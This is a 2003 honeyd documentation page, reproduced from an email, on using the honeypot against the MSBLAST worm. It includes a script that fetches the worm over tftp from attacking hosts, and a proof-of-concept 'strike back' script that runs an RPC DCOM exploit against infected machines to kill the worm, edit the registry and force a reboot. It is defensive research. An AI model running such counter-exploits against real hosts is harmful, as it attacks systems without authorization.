/usr/share/doc/honeyd-common/msblast.html is in honeyd-common 1.5c-8ubuntu1.
This file is owned by root:root, with mode 0o644.
The actual contents of the file can be viewed below.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Honeyd fights Windows Worms!</title>
<style type="text/css">
<!--
body,p,b,i,ul,ol,li,td { font-family: arial, helvetica, sans-serif; }
h1,h2,h3,h4,h5 { font-family: arial, helvetica, sans-serif;
font-weight: bold; }
div.body { margin-left: 32px; }
pre { font-family: monospace; }
-->
</style>
</head>
<body>
<body bgcolor="#ffffff">
<table noboder cellspacing="0" cellpadding="0" width="90%">
<tr>
<td bgcolor="#0880b8" nowrap>
<font size="-1" face="Arial,Helvetica" color="#30c0f0">
Center for Information Technology Integration
<br>
</font>
<center>
<font size="+3" face="Arial,Helvetica" color="#50d0ff">
Honeyd Vs MSBLAST.EXE
</font>
</center>
</td>
<td bgcolor="#0880b8">
</td>
</tr>
<tr>
<td>
</td>
</tr>
<tr>
<td bgcolor="#eeeeee">
<dl>
<dd>
<p>
<h1>Honeyd Vs MSBLAST.EXE</h1>
<em>From an email by Laurent Oudot of the Rstack team</em><br>
<em>2003-08-19</em><br>
<p>
<h2>Fighting worms with honeypots: honeyd vs msblast.exe</h2>
While trying to help the community to fight the evil worm MSBLAST, i
looked at my favorite honeypot, called honeyd, to check if we could not
play with the worm itself (Labrea played with another worm in the
past... the past should not be forgotten).
<p>
[Honeyd is a free software product by Niels Provos :
<a href="http://www.citi.umich.edu/u/provos/honeyd">http://www.citi.umich.edu/u/provos/honeyd</a>]
<p>
As i saw a growing number of TCP requests against my honeyd (port 135) i
decided to open the port (look at honeyd conf file for that) :
<dl>
<dd>
<table noborder cellpadding="0" cellspacing="0" center>
<tr><td nowrap bgcolor="#aaddbb">
<pre>
add template tcp port 135 open
</pre>
</td></tr>
</table>
</dd>
</dl>
<p>
Wooo, i got plenty of (fake) TCP sessions against this port. A tcpdump
could allow to learn what was launched against this port (tcpdump -n -w
135.cap -s 1514 tcp and port 135). This could be used to analyse the
virus network payload and shellcode.
<p>
Then i learned that the worm called MSBLAST wanted to get a shell over
the 4444 TCP port. So i created a fake service over the TCP port 4444,
to play with the worm :
<p>
<dl>
<dd>
<table noborder cellpadding="0" cellspacing="0" center>
<tr><td nowrap bgcolor="#aaddbb">
<pre>
add template tcp port 4444 "/bin/sh scripts/4444.sh $ipsrc $ipdst"
</pre>
</pre>
</td></tr>
</table>
</dd>
</dl>
<p>
Owing to this 4444.sh script, it was then able to begin to work with the
worm itself.
Almost firstable, this script 4444.sh was used to suck the worm directly
from the attacker. Here is an example that i created for fun with
moutane (rstack team) :
<dl>
<dd>
<table noborder cellpadding="0" cellspacing="0" center>
<tr><td nowrap bgcolor="#aaddbb">
<pre>
#!/bin/sh
# we create a temporary directory for each specific attacker
# to be sure we get every version on the wild
mkdir /tmp/$1-$2
cd /tmp/$1-$2
# we connect via tftp to the attacker
# and we get the msblast.exe file
tftp $1 << EOF
get msblast.exe
quit
EOF
</pre>
</td></tr>
</table>
</dd>
</dl>
<p>
I restarted my honeyd. Then, every hosts owned by msblast that was
attacking my honeypot, first saw that the port 135 was opened. They then
sent their evil payload on it, and naturally tried to launch their
commands on the port 4444...
I got the msblast.exe file in less than 5 minutes (internet is so evil
you know...) and give it to a friend for an internal analysis in the
rstack team.
<p>
Hmmm. This script (4444.sh) can easily be modified to do better things,
that's what we thought about...
<p>
Imagine that the honeypot sees an Msblast attack coming from a host.
That should mean that the host is infected by Msblast, right ?!
<p>
So, on an intranet, we tried to look at the possibility to automatically
clean an msblast'ed host that would attack the honeypot !
<p>
To be able to do that, we would only have to launch the same attack
against the attacker itself, in order to get a shell, and to kill the
evil process, and so on ("use the force luke...")
<p>
Bad thing would say laws-addicted guys. True. I agree.
<p>
So the idea was to strike back only against host from our internal
network, to avoid an attack against hosts that we don't manage (we
filtered the traffic in the final script and on an outbound router).
<p>
[!] This idea is very dangerous, cause bad people could use that to
automatically abuse infected hosts that attack them. I won't talk too
much about that to avoid another black hat script kiddy wave on the net.
<p>
Here is a funny proof of concept made with VG and Moutane for a 4444.sh
shell script.
When an infected host attacks the honeypot, honeyd launch the script
that will connect itself to the infected attacker using the RPC DCOM
remote exploit made by [oc192.us], gaining a shell too !
Then it will kill the process msblast.exe, the associated files on the
disk, and the will clean the registry.
Remember it's a proof of concept.
It will work against Windows XP hosts :
<dl>
<dd>
<table noborder cellpadding="0" cellspacing="0" center>
<tr><td nowrap bgcolor="#aaddbb">
<pre>
#!/bin/sh
# launch the exploit against the internal attacker
/usr/local/bin/evil_exploit_dcom -d $1 -t 1 -l 4445 << EOF
taskkill /f /im msblast.exe /t
del /f %SystemRoot%\System32\msblast.exe
echo Windows Registry Editor Version 5.00 > c:\cleaner_msblast.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
>> c:\cleaner_msblast.reg
echo "windows auto update" = "REM msblast.exe" >> c:\cleaner_msblast.reg
regedit /s c:\cleaner_msblast.reg
del /f c:\cleaner_msblast.reg
shutdown -r -f -t 0
exit
EOF
</pre>
</td></tr>
</table>
</dd>
</dl>
<p>
We tried it.
It worked :-)
Every msblasted infected hosts on our intranet, while attacking the
honeypot, received a strong strike back answer, destroying the worm on
it ("in your face, from downtown").
<p>
If you search something better to remove the worm, you can replace part
of the script by a simple : "cscript cleaner.vbs" where cleaner.vbs
could be inspired by <a href="http://www.rstack.org/oudot/cleaner.vbs">http://www.rstack.org/oudot/cleaner.vbs</a>.
<p>
You can also try to automatically install the patch on the infected host
(look at microsoft web site for that, they propose a vbs script).
<p>
Honeyd, used like that, is more than a Honeypot, it also plays the role
of a kind of IDS (who is infected) and Intrusion Prevention System...
<p>
Big thanks to moutane and vg from the team rstack for their help and
ideas for the tests (infected hosts, etc).
<p>
life is short, have fun.
<p>
<address>oudot@rstack.org</address>
member of the team rstack
<a href="http://www.rstack.org">http://www.rstack.org</a>
<p>
NB: To force honeyd to answer to every hosts, launch arpd without
argument, and use a honeyd config file like that :
<dl>
<dd>
<table noborder cellpadding="0" cellspacing="0" center>
<tr><td nowrap bgcolor="#aaddbb">
<pre>
create default
set default personality "Windows XP Pro"
add default tcp port 135 open
add default tcp port 4444 "/bin/sh scripts/4444.sh $ipsrc $ipdst"
set default default tcp action block
set default default udp action block
set default uid 32767 gid 32767
</pre>
</td></tr>
</table>
</dd>
</dl>
<p>
[<a href="http://www.citi.umich.edu/u/provos/honeyd/index.html">Back</a>]
</dd>
</dl>
</td>
<td bgcolor="#eeeeee">
</td></tr>
</table>
<hr>
<table noborder cellspacing="0" cellpadding="2" width="90%">
<tr><td>
Questions and Comments:
<address><a href="mailto:provos@citi.umich.edu">Niels Provos</a></address>
<!-- Created: Mon Mar 11 12:43:06 EST 2002 -->
<!-- hhmts start -->
Last modified: Fri Aug 1 21:12:20 EDT 2003
<!-- hhmts end -->
</td><td>
</td><td bgcolor="#ddffdd" align="middle">
You can keep me happy while hacking by reducing my
Wishlists:
<a href="http://www.citi.umich.edu/u/provos/wishlists/amazon.html">Books</a>,
<a href="http://www.citi.umich.edu/u/provos/wishlists/cdnow.html">Music</a><br>
</td>
<td bgcolor="#ddffdd" align="middle">
<a href="https://secure.bmtmicro.com/opera/buy-opera.html?AID=620358">
<img src="http://www.citi.umich.edu/u/provos/pictures/ol-get-00-en-mic.gif" alt="[Get Opera!]" width="88" height="31"></a>
</td></tr>
</table>
</body>
</html>
|